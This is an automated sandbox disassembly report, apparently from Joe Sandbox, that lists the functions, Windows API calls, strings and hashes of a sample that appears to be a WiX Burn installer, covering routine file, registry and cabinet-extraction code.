String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: 3b8a7944b14353e0f3e4bbf33b73b8a4ff5247920791c82d89fa0d8d85b946aa
Instruction ID: d178e3aad0bdc76fe961ad561bb2cdb61193391efde1335f1365bc905d9a4aed
Opcode Fuzzy Hash: 3b8a7944b14353e0f3e4bbf33b73b8a4ff5247920791c82d89fa0d8d85b946aa
Instruction Fuzzy Hash: E011263E60033196D7B11AA54E6CF3FB654EFF1B61F08402FFD849A340EA288D8192D9

Function 004C56A9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,004C6595,004C6595,?,004C563D,?,?,00000000), ref: 004C56E5
GetLastError.KERNEL32(?,004C563D,?,?,00000000,?,?,004C6595,?,004C7F02,?,?,?,?,?), ref: 004C5714

Strings

variable.cpp, xrefs: 004C5738
Failed to compare strings., xrefs: 004C5742
version.dll, xrefs: 004C56D7

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareErrorLastString
String ID: Failed to compare strings.$variable.cpp$version.dll
API String ID: 1733990998-4228644734
Opcode ID: a920cd9e5c72f95544b7ef8e31fb19093c1d51e11301c6aa58100b42468e28fc
Instruction ID: 8783069c8a492767b4c5edc6c2ac85b83677e1e505bf9c3863b9cfa78ca03654
Opcode Fuzzy Hash: a920cd9e5c72f95544b7ef8e31fb19093c1d51e11301c6aa58100b42468e28fc
Instruction Fuzzy Hash: CC210A3A641515EBC7148F98CD45F5EBBA4FB45720F21031EE924AB3C0EA34FD818694

Function 00500A28 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,004C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00500A38
GetLastError.KERNEL32(?,?,004C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00500A46
GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 00500A8B
GetLastError.KERNEL32(?,?,004C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00500A95

Strings

procutil.cpp, xrefs: 00500A6A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectProcessSingleWait
String ID: procutil.cpp
API String ID: 590199018-1178289305
Opcode ID: 2cc46fdeda6c80ddc1ffbc7dfb82dc4adb229a49f529e80a767f47c449166c28
Instruction ID: 54412a55251b44e50644584745f70ab3d5fb5a6afcb4863050bf676911d96730
Opcode Fuzzy Hash: 2cc46fdeda6c80ddc1ffbc7dfb82dc4adb229a49f529e80a767f47c449166c28
Instruction Fuzzy Hash: 64117037E41336A7DB209B958909BAE7EA4FB04760F128255ED54AB3C0D2348E00A6D1

Function 004E09EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004E140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,004E0A19,?,?,?), ref: 004E1434
Part of subcall function 004E140C: GetLastError.KERNEL32(?,004E0A19,?,?,?), ref: 004E143E

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 004E0A27
GetLastError.KERNEL32 ref: 004E0A31

Strings

cabextract.cpp, xrefs: 004E0A55
Failed to read during cabinet extraction., xrefs: 004E0A5F

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: b8854db078e2398567768b31e08c7370c60ca1485c38d723dfcaee73f6fe3223
Instruction ID: 4e7f2c72d4f0e6f8bbb4ebc7b1969a8e3d8c5869f5b24ffd84e3f8552ecd169a
Opcode Fuzzy Hash: b8854db078e2398567768b31e08c7370c60ca1485c38d723dfcaee73f6fe3223
Instruction Fuzzy Hash: 3E11E137A0126ABBDB219F96DC09E9F7F68FF04761B01412AFD14A7291C7349910D7E4

Function 004E140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,004E0A19,?,?,?), ref: 004E1434
GetLastError.KERNEL32(?,004E0A19,?,?,?), ref: 004E143E

Strings

Failed to move to virtual file pointer., xrefs: 004E146C
cabextract.cpp, xrefs: 004E1462

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: 8562aba848df9e43297d337246040a472e0198b9fde2f835da65cf390411edad
Instruction ID: 10f2d401370de1f18b401ae3acd86637fc17a936fb137773eea28fd684a0897c
Opcode Fuzzy Hash: 8562aba848df9e43297d337246040a472e0198b9fde2f835da65cf390411edad
Instruction Fuzzy Hash: 5B01F23798163AB7D7225A978C08E8BFF28FF00772711812AFD185A3A1D7399C10C6D8

Function 00503EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00503F73
GetLastError.KERNEL32 ref: 00503FD6

Strings

fileutil.cpp, xrefs: 00503FFA

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: fileutil.cpp
API String ID: 1948546556-2967768451
Opcode ID: cc12146dc67f2c3cad2a85e4cba6706484cb4c6873e21fa82ed8792d8933bd79
Instruction ID: 62d56668abf3f88045f37e12d43c4b379dee1abf2bab96243b057b18b1f9809f
Opcode Fuzzy Hash: cc12146dc67f2c3cad2a85e4cba6706484cb4c6873e21fa82ed8792d8933bd79
Instruction Fuzzy Hash: D5316271E0026A9BDB21CF15C9857EE7BB8FF44751F0040AAFA48E7280D7789EC49B95

Function 00504E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00503F9A,?,?,?), ref: 00504E5E
GetLastError.KERNEL32(?,?,00503F9A,?,?,?), ref: 00504E68

Strings

fileutil.cpp, xrefs: 00504E91

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: fileutil.cpp
API String ID: 442123175-2967768451
Opcode ID: 60e6862c5b87e94d41e0e405ad27824c1c54f3756780c2a7ae4bcff4e1be0761
Instruction ID: 9f4d3e57c1c47a1b98f7924e5b89a63f8629caf7a036e1ff6e7a91732f3202e4
Opcode Fuzzy Hash: 60e6862c5b87e94d41e0e405ad27824c1c54f3756780c2a7ae4bcff4e1be0761
Instruction Fuzzy Hash: B5F06D73A00229ABD7209E9ADD45EEFBB6DFB44761F010215FE04E7180D731AE009AE1

Function 0050490D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,004D8770,00000000,00000000,00000000,00000000,00000000), ref: 00504925
GetLastError.KERNEL32(?,?,?,004D8770,00000000,00000000,00000000,00000000,00000000), ref: 0050492F

Strings

fileutil.cpp, xrefs: 00504953

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: fileutil.cpp
API String ID: 2976181284-2967768451
Opcode ID: c90478718455a59bb597aa7de222b021dba31c63528c0026e30054d50dc3a004
Instruction ID: 4da77591a0f9878d97067771dafe75bf26ef8dc4d0069f6c93ce397788537914
Opcode Fuzzy Hash: c90478718455a59bb597aa7de222b021dba31c63528c0026e30054d50dc3a004
Instruction Fuzzy Hash: 21F086B660012EABDB118F85DD05EAF7FA8FF05760B014569BE4497251E731DD10DBE0

Function 004C3838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004C3877
GetLastError.KERNEL32 ref: 004C3881
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 004C38EA

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: 2d325c2fdecc97976d267f693afea0874f6dcf394f9c9b21ad5aff7cc0c9cd75
Instruction ID: f3fac0adc5b59f4d0a2183b4ca10b70a61c9932b6e03d4c06ce51629cc3dd209
Opcode Fuzzy Hash: 2d325c2fdecc97976d267f693afea0874f6dcf394f9c9b21ad5aff7cc0c9cd75
Instruction Fuzzy Hash: 4C2106BAD0123DA7DB20AF658C49F9B77A89B04711F1041AAFD14E7241DA78DE4486E4

Function 004C3A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,004C3BB6,00000000,?,004C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,004C13B8), ref: 004C3A20
RtlFreeHeap.NTDLL(00000000,?,004C3BB6,00000000,?,004C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,004C13B8,000001C7,00000100), ref: 004C3A27
GetLastError.KERNEL32(?,004C3BB6,00000000,?,004C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,004C13B8,000001C7,00000100,?), ref: 004C3A31

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: a14f20a5805d8e164d31f1f9fea85f75dced11f1841e82829b7a7aae1ee8968e
Instruction ID: f25a2e31e626891363d0a364a66c65b6c5064c42c0b574b48aaa0e3d73ea610c
Opcode Fuzzy Hash: a14f20a5805d8e164d31f1f9fea85f75dced11f1841e82829b7a7aae1ee8968e
Instruction Fuzzy Hash: FFD0C237A0013957C3201BE69C9CA5F7E58EF14AA2B014025FD44D6720D726CD10E2E4

Function 00500F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0052AAA0,00000000,?,005057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00500F80

Strings

regutil.cpp, xrefs: 00500FC3

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: c4497427bb867b3ffe96011b74b8659867a74ea88e590c75d600219d1cedcd6b
Instruction ID: 02e2b368ae97ef6937ec5210bc5f9f2d35bff564e08b21a136cf095c878f23ab
Opcode Fuzzy Hash: c4497427bb867b3ffe96011b74b8659867a74ea88e590c75d600219d1cedcd6b
Instruction Fuzzy Hash: 80F0F63360113366DB3059568C05F6FAE49FF957B0F155535BD469A2D0E6218C10B6F0

Function 005035C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005035F8

Part of subcall function 0050304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00503609,00000000,?,00000000), ref: 00503069
Part of subcall function 0050304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004EC025,?,004C5405,?,00000000,?), ref: 00503075

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: 956b8cdf02bddfbb133dc7e8369fde6fb6c5e594dece04e1cadf92d0ed0abb26
Instruction ID: a68c10f6db940148d387f4319e20b1508b527da7125ed3af825454bed1417222
Opcode Fuzzy Hash: 956b8cdf02bddfbb133dc7e8369fde6fb6c5e594dece04e1cadf92d0ed0abb26
Instruction Fuzzy Hash: F9314F76D00229ABCB11DFA9C884ADEBBF8FF08710F01456AED05BB351E7359D008BA4

Function 00505870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,0052AAA0,00000000,80070490,?,?,004D8B19,WiX\Burn,PackageCache,00000000,0052AAA0,00000000,00000000,80070490), ref: 005058CA

Part of subcall function 005010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0050112B
Part of subcall function 005010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00501163

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: a483d871d4ccf4a59f7ed9213b90dd4c0555f4788cf2a3eca062736323362c89
Instruction ID: 6b8350fa34477fa842c882fae439005f1a0dea641400797fcf1c5cdfe6481ff9
Opcode Fuzzy Hash: a483d871d4ccf4a59f7ed9213b90dd4c0555f4788cf2a3eca062736323362c89
Instruction Fuzzy Hash: B011913680062AEFDB216E948D859AFBF68FF44320B258139FD4167151E7314E50EBD1

Function 004C34B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,004D8BD3,0000001C,80070490,00000000,00000000,80070490), ref: 004C34D5

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: faa564709e5be1be40ecdcbc6f4cb1689699b0233bb4078c08cea86a7675ab22
Instruction ID: f195c1593d83fae7a2d691eaa85a64dbe6d88436f61ce3cc6c5bfe9244523694
Opcode Fuzzy Hash: faa564709e5be1be40ecdcbc6f4cb1689699b0233bb4078c08cea86a7675ab22
Instruction Fuzzy Hash: 01E0C2762002243BE6822E625C04EEB7B4C9F05355B00801AFE00D2010E36AEA0083B8

Function 00502EFE Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,00000000,004C556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00502F0B

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: dfbcdac7f57d869eae660c88ba6133cfdcec811d7f971be3ac67b7a9d419ae95
Instruction ID: 24b56acac40aa072dc42cce13a5aef0e1d086326ba6b6164b967a506e545e910
Opcode Fuzzy Hash: dfbcdac7f57d869eae660c88ba6133cfdcec811d7f971be3ac67b7a9d419ae95
Instruction Fuzzy Hash: 0DE0FEF1925625DEEB208F59BD854467BB8FF3AB40314410BB804D6220C7B0644BEFD0

Function 004FF479 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004FF491

Part of subcall function 0050998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00509A09
Part of subcall function 0050998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00509A1A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4894f82fda00fee99934908f3e237adbda915aaa640c22e97aa2ac5633463aa0
Instruction ID: f0b879127d1ad36d0c5633cbbd18708f98eeac546d6234e78989fac876b1e3ed
Opcode Fuzzy Hash: 4894f82fda00fee99934908f3e237adbda915aaa640c22e97aa2ac5633463aa0
Instruction Fuzzy Hash: A1B012A926A412BE720811613C06C3B090CEFD3F22370C66FB440C00C1A8400C458033

Function 004FF49A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004FF491

Part of subcall function 0050998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00509A09
Part of subcall function 0050998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00509A1A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2c4a20e06cd3740394c6b7569182eb85a24ff89be783f788b7c63de18fd82321
Instruction ID: 7f84e65609a581061d516a2d2cb46f5419c3b2a4d43163698a4c1afecc99ef04
Opcode Fuzzy Hash: 2c4a20e06cd3740394c6b7569182eb85a24ff89be783f788b7c63de18fd82321
Instruction Fuzzy Hash: 1BB012A526A412AF724851653D07C3B094CEFD7F22370856FB040C10C1E8440C464033

Function 004FF4AA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004FF491

Part of subcall function 0050998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00509A09
Part of subcall function 0050998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00509A1A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7c2ad85369c577fd7e9a6591683f10d427dc35c101073e54662b83c0bdb5e3d8
Instruction ID: 939bdd0bb0add3baa8ca6d6cb0d4351b7ae55352ebc0e8ca51cb3f41eeade8f2
Opcode Fuzzy Hash: 7c2ad85369c577fd7e9a6591683f10d427dc35c101073e54662b83c0bdb5e3d8
Instruction Fuzzy Hash: DCB012A526A512AE724852653C06C3B094CEFD7F22370C66FF040C10C1E8400C854033

Function 00509653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0050966B

Part of subcall function 0050998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00509A09
Part of subcall function 0050998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00509A1A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6d53e2892db36c053bf93d454b1eb65c8986d32d8fa19cad1a5a5af54dbc6c5b
Instruction ID: 1e49edbc8bb6a3e0cd6405299b3d157db28647846923025c9cbae585c2482a1c
Opcode Fuzzy Hash: 6d53e2892db36c053bf93d454b1eb65c8986d32d8fa19cad1a5a5af54dbc6c5b
Instruction Fuzzy Hash: 06B01295269112BDBA0811417C86C3F0D0CFFC2F11330C91EB000E00C6A8400C400233

Function 00509674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0050966B

Part of subcall function 0050998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00509A09
